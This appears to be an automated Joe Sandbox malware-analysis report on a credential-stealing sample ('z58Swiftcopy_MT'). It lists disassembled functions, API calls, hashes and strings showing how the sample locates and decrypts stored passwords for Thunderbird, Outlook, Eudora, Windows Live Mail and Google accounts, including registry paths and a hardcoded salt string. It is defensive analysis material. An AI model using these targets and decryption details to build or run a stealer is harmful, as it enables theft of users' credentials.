                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                                      • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                                                      Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                                      • API String ID: 379999529-620537770
                                                                                                                                                                                                                                      • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                                                                                      Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                                      • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                                      • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                                      • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                                                                                      Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,762D0A60,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404AB8
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,762D0A60), ref: 00404ADE
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                                      • API String ID: 745651260-375988210
                                                                                                                                                                                                                                      • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                                                                                      Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                                      • API String ID: 1197458902-317895162
                                                                                                                                                                                                                                      • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                                                                                                      Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                                      • String ID: h4ND
                                                                                                                                                                                                                                      • API String ID: 3662548030-3825183422
                                                                                                                                                                                                                                      • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                      • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                                                                                                                                                      Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                                      • API String ID: 2768085393-1693574875
                                                                                                                                                                                                                                      • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                                                                                                                                      Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                                      • API String ID: 832325562-2578778931
                                                                                                                                                                                                                                      • Opcode ID: 29f36c30459babb599eafc743357add432badc7eb4b16160b2380ad1a198b008
                                                                                                                                                                                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29f36c30459babb599eafc743357add432badc7eb4b16160b2380ad1a198b008
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                                                                                                                                      Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                                                                                      Function 004086E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
